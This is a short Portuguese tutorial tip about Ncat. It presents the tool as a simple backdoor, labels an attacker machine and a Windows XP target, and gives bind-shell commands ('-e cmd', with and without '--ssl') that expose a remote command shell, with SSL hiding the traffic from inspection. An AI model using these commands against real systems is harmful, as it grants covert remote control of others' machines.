Ncat com SSL

Publicado por Roberto Soares (3spreto) em 07/11/2011

[ Hits: 7.973 ]

Blog: http://codesec.blogspot.com

 


Ncat com SSL



Acredito que a grande maioria conhece o Netcat, não? Pois bem, em uma espécie de variação, surge o Ncat. Sim, são diferentes antes que perguntem. Porém a grande maioria de suas funcionalidades se assemelham comparando-as entre si.

O Ncat utiliza os protocolos TCP e UDP para sua comunicação e também funciona sobre o IPv4 e o IPv6. Uma das características mais simples do Ncat é a transferência de dados entre dois Hosts (Linux <--> Linux, Windows <--> Windows ou Linux <--> Windows) de forma simplificada.

Também nos dá a possibilidade de executar comandos remotamente como se estivéssemos em nossa própria máquina, ainda se não bastasse, conseguimos prover uma "dose" considerável de segurança, utilizando o SSL (Secure Sockets Layer), que é um protocolo criptográfico responsável por prover uma comunicação segura sob a Internet.

Imagine isso para um backdoor simples heim?

Onde:
  • 192.168.0.125 é o IP do atacante. (BackTrack)
  • 192.168.0.147 é o IP do alvo. (XP)

Sem SSL

No alvo digite o comando:

ncat.exe -v -l 1337 -e cmd --allow 192.168.0.125
Linux: Ncat com SSL
E na máquina do atacante digite:

# ncat -v 192.168.0.147 1337
Linux: Ncat com SSL

Com SSL

No alvo digite o comando:

ncat.exe -v -l 1337 --ssl -e cmd --allow 192.168.0.125
Linux: Ncat com SSL
E na máquina do atacante digite:

# ncat -v --ssl 192.168.0.147 1337
Linux: Ncat com SSL
Agora utilize o wireshark com apenas o filtro "tcp". Em ambas as formas, clique com o botão direito do mouse nas conexões tcp e vá em "Follow Stream" e compare. :D

Ncat Help
Linux: Ncat com SSL

Transferência de arquivos

Ok, ok, antes de perguntarem sobre como efetuar a transferência de um arquivo entre 2 Hosts Linux, aqui vai os comandos.

Máquina que receberá o arquivo.
Linux: Ncat com SSL
Máquina que enviará o arquivo.
Linux: Ncat com SSL
Veja o novo conteúdo do arquivo.
Linux: Ncat com SSL

Links

Previamente publicada em: Até a próxima!
:wq!

Outras dicas deste autor

Escutar e gravar rádios online

WPSPLOIT - Explorando o WordPress com Metasploit

Proteção contra vulnerabilidade POODLE SSLv3

Atualizando o BackTrack 4 com o apt-get e Fast-Track

Auditando senhas com Ncrack

Leitura recomendada

Instalando Tcptrack no Slackware 13

Travando Msn por horario usando iptables

Reforçando a segurança contra exploits

Proteja seu GNU/Linux de maneira correta!

Hackeando sem riscos

  

Comentários

Nenhum comentário foi encontrado.



Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts